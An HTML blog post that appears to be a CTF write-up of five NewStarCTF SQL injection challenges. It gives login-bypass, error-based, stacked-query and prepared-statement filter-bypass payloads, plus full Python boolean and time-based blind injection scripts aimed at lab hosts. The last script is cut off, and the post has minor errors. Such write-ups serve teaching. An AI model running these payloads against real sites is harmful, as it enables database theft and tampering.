<!DOCTYPE html>
<html lang="en">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  <link rel="icon" href="/images/favicon.ico">
  
  <title>NewStarCTF SQL注入题 | Err0r233</title>
  <meta name="author" content="Err0r2333" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="POST, SQL_Injection" />
  
  <meta name="description" content="摆烂大师的第一篇Web文章，qwq。检验我摆烂的水平的时间到了 写写NewStarCTF的SQL注入题吧… 五周考了五个注入，考的点都不一样">
<meta property="og:type" content="article">
<meta property="og:title" content="NewStarCTF SQL注入题">
<meta property="og:url" content="http://example.com/posts/40736.html">
<meta property="og:site_name" content="Err0r233">
<meta property="og:description" content="摆烂大师的第一篇Web文章，qwq。检验我摆烂的水平的时间到了 写写NewStarCTF的SQL注入题吧… 五周考了五个注入，考的点都不一样">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/favicon.ico">
<meta property="article:published_time" content="2022-11-08T07:24:09.000Z">
<meta property="article:modified_time" content="2023-03-12T09:43:56.842Z">
<meta property="article:author" content="Err0r2333">
<meta property="article:tag" content="SQL_Injection">
<meta property="article:tag" content="POST">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/favicon.ico">
<meta name="twitter:site" content="@Err0r2333">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner3.png');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/qwq.jpg');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Err0r233" type="application/atom+xml">
</head>



    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                        
                                            <li><a href="/"><i class="fa fa-home"></i>首页</a></li>
                                        
                                    
                                        
                                            <li><a href="/archives/"><i class="fa fa-file"></i>档案馆</a></li>
                                        
                                    
                                        
                                            <li><a href="/friends/"><i class="fa fa-paw"></i>好伙伴</a></li>
                                        
                                    
                                        
                                            <li>
                                                <a><i class="fa fa-link"></i>链接</a>
                                                <ul class="sub-menu">
                                                    
                                                        
                                                    
                                                </ul>
                                            </li>
                                        
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">Err0r233</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>Err0r233</h2> <br />
                        <span>Err0r233的个人博客</span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="http://example.com/posts/40736.html">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">NewStarCTF SQL注入题</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2022-11-08T07:24:09.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2022-11-08</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">Err0r2333</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~9.54K
                    
                    字
                </li>
                
                    <li id="/posts/40736.html" class="leancloud_visitors" data-flag-title="NewStarCTF SQL注入题">
                        <i class="fa fa-eye"></i>
                        <span class="leancloud-visitors-count"> </span> 次阅读
                    </li>
                    
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1678614236842"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
            
            
            <hr />
            <div itemprop="articleBody"><p>摆烂大师的第一篇Web文章，qwq。检验我摆烂的水平的时间到了</p>
<p>写写NewStarCTF的SQL注入题吧… 五周考了五个注入，考的点都不一样</p>
<span id="more"></span>
<h1><span id="newstarctf-week-1-word-for-you"> NewStarCTF Week 1： Word - For - You</span></h1>
<p>嗯… 这个题其实并不算sql注入，只是让你熟悉SQL的语句罢了</p>
<h2><span id="打开靶机"> 打开靶机</span></h2>
<p>查询语句发现，输入1和输入1’的回显是一致的，根据这个信息能够初步得出考的应该不是SQL注入</p>
<img src="/posts/40736/1.png" class title="输入1时的回显">
<img src="/posts/40736/2.png" class title="输入1" alt="时的回显">
<h2><span id="sql万能密码"> SQL万能密码</span></h2>
<p>一般查询数据库执行的语句时 <code>select user_id,user_type,email from users where user_id='用户名' and password='密码'</code></p>
<p>由于后台进行数据库查询时没有滤过单引号，当输入admin 和 1’ or’1’='1时，执行的语句为：</p>
<p><code>select user_id,user_type,email from users where user_id='admin' and password='1' or'1'='1'</code></p>
<p>这样子看的话，SQL查询语句被分成了两段：</p>
<p>第一段：<code>select user_id,user_type,email from users where user_id='admin' and password='1'</code>   （由于sql语句中逻辑优先度 【=】&gt;【and】&gt;【or】）</p>
<p>第二段：<code>'1'='1'</code></p>
<p>这两段语句之间的逻辑运算符是or</p>
<p>由于1=1恒为真，所以这段SQL语句恒为真，认证成功</p>
<h2><span id="payload"> payload</span></h2>
<p>使用SQL注入万能密码查询</p>
<p><code>1' or'1'='1</code></p>
<p>拿到flag</p>
<img src="/posts/40736/3.png" class title="拿到flag">
<h1><span id="newstarctf-week-2-word-for-you-2-gen"> NewStarCTF Week 2： Word - For - You (2 Gen)</span></h1>
<p>报错注入 / sqlmap一把梭</p>
<h2><span id="打开靶机"> 打开靶机</span></h2>
<p>输入1’ 发现报错，存在SQL注入</p>
<h2><span id="测试联合注入"> 测试联合注入</span></h2>
<h3><span id="测试字段"> 测试字段</span></h3>
<p>输入<code>1' order by 3#</code> 报错</p>
<p>而输入<code>1' order by 2#</code> 回显正常，说明字段数为2</p>
<img src="/posts/40736/4.png" class title="测试字段3，报错">
<img src="/posts/40736/5.png" class title="测试字段2，正常">
<h3><span id="测试回显位"> 测试回显位</span></h3>
<p>输入<code>1' union select 1,2#</code> 只显示查询成功，说明没有回显位</p>
<p>无法使用联合注入查询</p>
<img src="/posts/40736/6.png" class title="无回显位">
<h2><span id="使用报错注入"> 使用报错注入</span></h2>
<p>报错注入适用条件：页面没有回显位，但是页面会有报错信息，例如输入 <code>1' order by 3#</code>的时候</p>
<p>注入语句：<code>updatexml(1,'~',3)</code>，当第二个语句包含特殊字符时，数据库会报错，并且会把参数的内容显示在报错中</p>
<p>需要使用concat语句拼接字符串，长串的语句使用group_concat</p>
<p>查询命令：</p>
<p><code>1' and updatexml(1,concat('~',database()),3)#</code>  		--爆库</p>
<p>爆出库名wfy</p>
<img src="/posts/40736/7.png" class title="报错注入爆库">
<p><code>1' and updatexml(1,concat('~',(select group_concat(table_name) from inforamtion_schema.tables where table_schema=database())),3)#</code>			--爆表</p>
<img src="/posts/40736/8.png" class title="报错注入爆表">
<p><code>1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='wfy_comments')),3)#</code>		--爆列名</p>
<img src="/posts/40736/9.png" class title="报错注入爆列名">
<p>爆出的列名为id,text,user,name,display</p>
<p>我们只需要查询text的内容即可</p>
<h2><span id="payload"> payload</span></h2>
<p><code>1' and updatexml(1,concat('~',(select(reverse(group_concat(text))) from wfy_comments)),3)#</code></p>
<p>要点：</p>
<ul>
<li>报错注入的查询内容的字符是有限制的，如果内容过多，则无法回显。所以我们这里使用reverse()将flag倒着输出</li>
<li>使用select之前都需要在select前加括号</li>
</ul>
<p>拿到倒置的flag</p>
<img src="/posts/40736/10.png" class title="获取flag">
<h2><span id="sqlmap一把梭"> sqlmap一把梭</span></h2>
<p>sqlmap的使用教程可以查看这篇博客文章</p>
<p>&lt;[(9条消息) <a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_46363249/article/details/119975790?ops_request_misc=%7B%22request_id%22%3A%22166438065816782412550364%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&amp;request_id=166438065816782412550364&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-119975790-null-null.142%5Ev50%5Epc_rank_34_1,201%5Ev3%5Econtrol_2&amp;utm_term=sqlmap&amp;spm=1018.2226.3001.4187">工具使用]SqlMap_拈花倾城的博客-CSDN博客_sqlmap联动msf</a>/&gt;</p>
<p>我们可以使用burp抓包的方式，抓到包的数据存入txt文本内，并使用sqlmap梭哈</p>
<p>将抓包的数据保存至txt文本内</p>
<p><code>sqlmap -r 1.txt --dbs</code></p>
<img src="/posts/40736/11.png" class title="sqlmap:爆库">
<img src="/posts/40736/12.png" class title="sqlmap:爆库成功">
<p><code>sqlmap -r 1.txt -D wfy --dump</code></p>
<img src="/posts/40736/13.png" class title="sqlmap:拿到flag">
<p>爆库内容</p>
<h1><span id="newstarctf-week-3-multisql"> NewStarCTF Week 3： multiSQL</span></h1>
<p>堆叠注入，sql预处理语句</p>
<p>题目描述：需要我们修改火华老师的成绩，让他通过四级考试</p>
<h3><span id="测试联合注入-报错注入"> 测试联合注入 / 报错注入</span></h3>
<p>输入<code>1' 1</code>均无回显</p>
<p>输入<code>1' union select 1,2,3,4</code># 发现被过滤</p>
<p>联合注入失败</p>
<p>由于无报错信息，无法使用报错注入</p>
<h3><span id="堆叠注入"> 堆叠注入</span></h3>
<p>堆叠注入是将多个sql语句一起执行，使用;间隔的注入方式</p>
<p>输入<code>1';show databases;#</code> 爆库</p>
<img src="/posts/40736/14.png" class title="堆叠注入，爆库">
<p>输入<code>1';show tables;#</code>  爆表</p>
<img src="/posts/40736/15.png" class title="堆叠注入，爆表">
<p>输入<code>1';show columns from score;#</code> 爆列名</p>
<img src="/posts/40736/16.png" class title="堆叠注入，爆列名">
<h3><span id="修改数据"> 修改数据</span></h3>
<p>使用update语句修改分数即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update`score` set listen=9999 where username=&quot;火华&quot;</span><br></pre></td></tr></table></figure>
<p>发现被过滤，怀疑过滤update</p>
<p>所以这里需要我们使用sql预处理语句进行拼接，绕过update的过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;set @sql=concat(&#x27;u&#x27;,&#x27;pdate `score` set listen=99999 where username=&quot;火华&quot;&#x27;);prepare sql_exe from @sql;execute sql_exe;#</span><br></pre></td></tr></table></figure>
<ul>
<li>设置sql语句=拼接u 和后面的语句</li>
<li>预处理sql_exe</li>
<li>执行sql_exe</li>
</ul>
<p>点击验证成绩即可，然后就能拿到flag</p>
<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;; handler `score` open as `a`; handler `a` read next;#</span><br></pre></td></tr></table></figure>
<p>查看分数</p>
<img src="/posts/40736/17.png" class title="堆叠注入，查看分数">
<p>点击验证成绩就能获得flag</p>
<h3><span id="彩蛋"> 彩蛋</span></h3>
<p>这里如果修改的分数不一样的话，拿到flag的对话也是不一样的</p>
<p>修改成100分的结果如下</p>
<img src="/posts/40736/18.png" class title="获取flag">
<p>修改成99999分的结果如下</p>
<img src="/posts/40736/19.png" class title="获取flag">
<p><s>所以这个故事告诉我们不要把分数改的太大（雾）</s></p>
<h1><span id="newstarctf-week-4-又一个sql"> NewStarCTF Week 4： 又一个SQL</span></h1>
<p>异或/布尔盲注</p>
<h2><span id="打开靶机"> 打开靶机</span></h2>
<p>尝试性输入1 和 1’</p>
<img src="/posts/40736/20.png" class title="尝试联合注入">
<img src="/posts/40736/21.png" class title="尝试联合注入">
<p>果然，寄。没有回显位，没有报错信息。</p>
<p>我们常用的三种注入方式已经无效了，所以我们接下来要考虑盲注</p>
<p>由于输入1 和 1’的回显信息是好耶和啊哦（刚好是两种不同的信息）</p>
<p>我们这里输入0试试</p>
<img src="/posts/40736/22.png" class title="盲注测试">
<p>发现输入0和输入1是两种不同的回显，这样我们就可以使用盲注了</p>
<h2><span id="异或运算"> 异或运算</span></h2>
<p>异或的运算有：</p>
<ul>
<li>1 ^ 1 = 0</li>
<li>1 ^ 0 = 1</li>
<li>0 ^ 0 = 0</li>
<li>0 ^ 1 = 1</li>
</ul>
<p>也就是说，两件事的异或运算中，如果有一真一假，就会输出1</p>
<p>如果两件都是真，则输出0</p>
<p>那么我们就可以通过异或运算构造sql语句查询</p>
<p><code>1^(length(database())=3)</code></p>
<p>注：如果过滤空格，则需要通过加括号的方式进行绕过，此题过滤了空格，所以要在length前加括号</p>
<img src="/posts/40736/24.png" class title="空格过滤">
<p>如果数据库的名称长度为3，则为真 1^1 = 0，传的数据为0，回显为啊哦</p>
<p>如果数据库的名称长度不为3，则传的数据为1，回显为好耶</p>
<p>通过不断更改=后面的数字，可以得出数据库的长度</p>
<img src="/posts/40736/23.png" class title="盲注测试">
<p>发现=3时，返回啊哦，则说明数据库长度为3，并且布尔/异或盲注可用~</p>
<p>接下来就是编写脚本的事情了</p>
<h2><span id="编写盲注脚本"> 编写盲注脚本</span></h2>
<p>采用二分法方式编写盲注脚本</p>
<h3><span id="啥是二分法方式"> 啥是二分法方式？</span></h3>
<p>emmm，盲注的原理是一个字符的ascii码数值与你的数值作比较，需要一个个进行比较输出</p>
<p>比如爆库的一个查询语句是1^(ascii(substr(database(),1,1))=100)</p>
<p>即数据库名称的第一个字符的ascii 与 100 比较，如果是100 即提交0，返回的值是啊哦</p>
<p>而二分法能够缩短这个过程（</p>
<p>首先，从数组的中间元素开始搜索，如果该元素正好是目标元素，则搜索过程结束，否则执行下一步。</p>
<p>如果目标元素大于/小于中间元素，则在数组大于/小于中间元素的那一半区域查找，然后重复步骤（1）的操作。</p>
<p>如果某一步数组为空，则表示找不到目标元素。</p>
<p>大致意思是取第一个字符的ascii值和ascii（32，128）中间值，也就是80（刚好是常用的字段）作比较，如果ascii值大于中间值，从（80,132）的中间值比较,重复比较 直至ascii值相等。</p>
<h3><span id="结束一个判断的依据"> 结束一个判断的依据</span></h3>
<p>根据页面返回的信息不同，在我的情况中，如果返回的是啊哦，说明是1^1型，那么，啊哦就是正确的依据</p>
<h3><span id="python编写"> Python编写</span></h3>
<p>这里给出post / get请求的两种盲注的脚本（</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">url = <span class="string">&#x27;http://b4281729-cf5b-4705-81b6-74971a11b390.node4.buuoj.cn:81/comments.php&#x27;</span>  <span class="comment">#目标url</span></span><br><span class="line"></span><br><span class="line">res = <span class="string">&#x27;&#x27;</span> <span class="comment">#输出的结果</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">    left = <span class="number">32</span></span><br><span class="line">    right = <span class="number">128</span></span><br><span class="line">    mid = (left + right) // <span class="number">2</span>    <span class="comment">#二分法固定的格式（  定好ascii的左右两端</span></span><br><span class="line">    <span class="keyword">while</span> (left &lt; right):    <span class="comment">#post请求，前面的name可以改为其他post传参的变量名</span></span><br><span class="line">        payload = &#123;</span><br><span class="line">                <span class="string">&quot;name&quot;</span>:<span class="string">&quot;1^(ascii(substr(database(),%d,1))&lt;%d)&quot;</span>%(i,mid)  <span class="comment">#循环传入i,mid  爆库</span></span><br><span class="line">                <span class="comment">#&quot;name&quot;:&quot;1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))&lt;%d)&quot;%(i,mid) #爆表</span></span><br><span class="line">                <span class="comment">#&quot;name&quot;:&quot;1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=&quot;wfy_comments&quot;)),%d,1))&lt;%d)&quot;%(i,mid) #爆列</span></span><br><span class="line">                <span class="comment">#&quot;name&quot;:&quot;1^(ascii(substr((select(group_concat(text))from(wfy_comments)),%d,1))&lt;%d)&quot;%(i,mid) #读取内容</span></span><br><span class="line">                <span class="comment">#&quot;name&quot;:&quot;1^(ascii(substr((select(reverse(group_concat(text)))from(wfy_comments)),%d,1))&lt;%d)&quot;%(i,mid) #读取内容，倒序输出</span></span><br><span class="line">            </span><br><span class="line">        &#125;</span><br><span class="line">        html=requests.post(url,data=payload) <span class="comment">#post传参，传入数据=payload内容</span></span><br><span class="line">        <span class="built_in">print</span>(payload) <span class="comment">#方便检测有没有问题</span></span><br><span class="line">        time.sleep(<span class="number">0.04</span>) <span class="comment">#防止buuoj.cn的429</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;啊哦&quot;</span> <span class="keyword">in</span> html.text:</span><br><span class="line">                right = mid</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">                left = mid + <span class="number">1</span>  <span class="comment">#如果返回的不是啊哦，说明为假，例如&lt;80时为假,则需要+1</span></span><br><span class="line">        mid = (left + right) // <span class="number">2</span> <span class="comment">#重复上述过程</span></span><br><span class="line">    <span class="keyword">if</span> mid &lt;= <span class="number">32</span> <span class="keyword">or</span> mid &gt;=<span class="number">127</span>:</span><br><span class="line">        <span class="keyword">break</span> <span class="comment">#找到的值不存在时，退出</span></span><br><span class="line">    res+=<span class="built_in">chr</span>(mid-<span class="number">1</span>)  <span class="comment">#小于号，需要-1</span></span><br><span class="line">    <span class="built_in">print</span>(res) <span class="comment">#输出结果</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Final Result:&quot;</span>,res) <span class="comment">#输出结果</span></span><br><span class="line"><span class="comment">#print(&quot;Final Result&quot;,res[::-1]) #采用倒序输出时，将结果正向输出</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>其实你只要跑一次就知道为什么要-1了</p>
<p>最后一次输出的值是&lt;120，返回为真，但是我们此时的mid是120，真正的值是&lt;120</p>
<p>get传参也是如此</p>
<p><a target="_blank" rel="noopener" href="http://xn--buuoj-xf6hi49xzo2alxd.cn">这里给出buuoj.cn</a> FinalSQL的盲注脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> sys<span class="comment">#头文件</span></span><br><span class="line"></span><br><span class="line">url=<span class="string">&quot;http://1189e07b-be07-49cc-9b96-af07b0b4f9b0.node4.buuoj.cn:81/search.php?id=&quot;</span></span><br><span class="line"></span><br><span class="line">res=<span class="string">&quot;&quot;</span> <span class="comment">#结果</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">1000</span>): <span class="comment">#循环</span></span><br><span class="line">        left=<span class="number">32</span></span><br><span class="line">        right=<span class="number">128</span></span><br><span class="line">        mid=(left + right) //<span class="number">2</span>  <span class="comment">#二分中值</span></span><br><span class="line">        <span class="keyword">while</span> (left &lt; right):</span><br><span class="line">                <span class="comment">#payload = url+&quot;1^(ascii(substr(database(),%d,1))&lt;%d)#&quot;%(i,mid)#爆库</span></span><br><span class="line">                <span class="comment">#payload = url+&quot;1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))&lt;%d)#&quot;%(i,mid)#爆表</span></span><br><span class="line">                <span class="comment">#payload = url+&quot;1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#x27;F1naI1y&#x27;)),%d,1))&lt;%d)#&quot;%(i,mid)#爆列</span></span><br><span class="line">                <span class="comment">#payload = url+&quot;1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))&lt;%d)#&quot;%(i,mid) #爆字段，第一个%d传入i 第二个%d传入mid值，数据库的ascii与mid两个作比较，如果一直&lt; 一直循环</span></span><br><span class="line">                payload = url+<span class="string">&quot;1^(ascii(substr((select(reverse(group_concat(id,username,password)))from(F1naI1y)),%d,1))&lt;%d)#&quot;</span>%(i,mid) <span class="comment">#爆字段，第一个%d传入i 第二个%d传入mid值，数据库的ascii与mid两个作比较，如果一直&lt; 一直循环，倒序输出</span></span><br><span class="line">                html = requests.get(payload)</span><br><span class="line">                <span class="built_in">print</span>(payload)</span><br><span class="line">                time.sleep(<span class="number">0.04</span>)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&quot;ERROR&quot;</span> <span class="keyword">in</span> html.text: <span class="comment">#这里写入的传参值是&lt; 返回的是ERROR才是对的反应</span></span><br><span class="line">                        right = mid <span class="comment">#如果有延时，右值取中值，再用左+右/2的新区间值与ascii比较(例如，第一次是ascii与80,如果小于80 用ascii与32+80/2=56比较)</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                        left = mid + <span class="number">1</span>  <span class="comment">#如果没有，左值取中值+1，取（81,132）中值比较，ascii值比mid值要大</span></span><br><span class="line">                mid = (left + right) // <span class="number">2</span> <span class="comment">#重复上述过程</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> mid &lt;=<span class="number">32</span> <span class="keyword">or</span> mid &gt;=<span class="number">127</span>:</span><br><span class="line">                <span class="keyword">break</span> <span class="comment">#防止超出ascii码值</span></span><br><span class="line">        res += <span class="built_in">chr</span>(mid-<span class="number">1</span>) <span class="comment">#小于号，值要-1</span></span><br><span class="line">        <span class="built_in">print</span>(res) <span class="comment">#打印</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Final Result:&quot;</span>,res)</span><br><span class="line"><span class="comment">#print(&quot;Final Result:&quot;,res[::-1]) #采用倒序输出时，将结果正向输出</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>我们愉快的跑脚本就完事了</p>
<img src="/posts/40736/25.png" class title="爆破flag">
<h1><span id="newstarctf-week-5-final-round"> NewStarCTF Week 5： Final Round</span></h1>
<p>延时盲注</p>
<p>题面提示：啊呜，好困呜呜（sleep）</p>
<h2><span id="进入靶机"> 进入靶机</span></h2>
<p>其实已经不用测什么方式注入了，sleep嘛，延时注入</p>
<p>测试语句：</p>
<p><code>114514||if(length(database())=3,sleep(0.2),1)</code></p>
<p>如果数据库名长度为3，休眠两秒再访问（</p>
<p>肉眼可见的延迟</p>
<h2><span id="编写脚本"> 编写脚本</span></h2>
<p>同样使用python脚本，同样也是post请求，同样也是二分法</p>
<p>套异或的就行了，只不过判断的方式有些不同</p>
<p>bool/异或 是根据1和0的两种回应来判断的，而time是根据访问的时间来进行访问的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url=<span class="string">&#x27;&#x27;</span></span><br><span class="line">res=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">    left = <span class="number">32</span></span><br><span class="line">    right = <span class="number">128</span></span><br><span class="line">    mid = (left + right) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">while</span>(left &lt; right):</span><br><span class="line">        payload = &#123;</span><br><span class="line">            <span class="comment">#&quot;name&quot; : &quot;114514||if(ascii(substr(database(),%d,1))&lt;%d,sleep(0.3),1)&quot;%(i,mid) #爆库</span></span><br><span class="line">            <span class="comment">#&quot;name&quot; : &quot;114514||if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))&lt;%d,sleep(0.3),1)&quot;%(i,mid)</span></span><br><span class="line">            <span class="comment">#&quot;name&quot; : &quot;114514||if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=&#x27;wfy_comments&#x27;)),%d,1))&lt;%d,sleep(0.3),1)&quot;%(i,mid) #注意引号</span></span><br><span class="line">            <span class="comment">#&quot;name&quot; : &quot;114514||if(ascii(substr((select(group_concat(text))from(wfy_comments)),%d,1))&lt;%d,sleep(0.3),1)&quot;%(i,mid)</span></span><br><span class="line">            <span class="comment">#&quot;name&quot; : &quot;114514||if(ascii(substr((select(reverse(group_concat(text)))from(wfy_comments)),%d,1))&lt;%d,sleep(0.3),1)&quot;%(i,mid) #同样的倒置输出</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">print</span>(payload)</span><br><span class="line">        times = time.time() <span class="comment">#发送访问请求前的时间</span></span><br><span class="line">        html = requests.post(url,data=payload)</span><br><span class="line">        timee = time.time() <span class="comment">#发送访问后的时间</span></span><br><span class="line">        keep = timee - times <span class="comment">#当然是大-小</span></span><br><span class="line">        time.sleep(<span class="number">0.2</span>) <span class="comment">#防止429</span></span><br><span class="line">        <span class="keyword">if</span> keep &gt; <span class="number">2</span>:</span><br><span class="line">            right = mid</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            left = mid + <span class="number">1</span></span><br><span class="line">        mid = (left + right) //<span class="number">2</span></span><br><span class="line">        </span><br><span class="line">    <span class="keyword">if</span> mid &lt;= <span class="number">32</span> <span class="keyword">or</span> mid &gt;= <span class="number">127</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    res+=<span class="built_in">chr</span>(mid-<span class="number">1</span>)</span><br><span class="line">	<span class="built_in">print</span>(res)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Final Results:&quot;</span>,res) <span class="comment">#输出最终结果</span></span><br><span 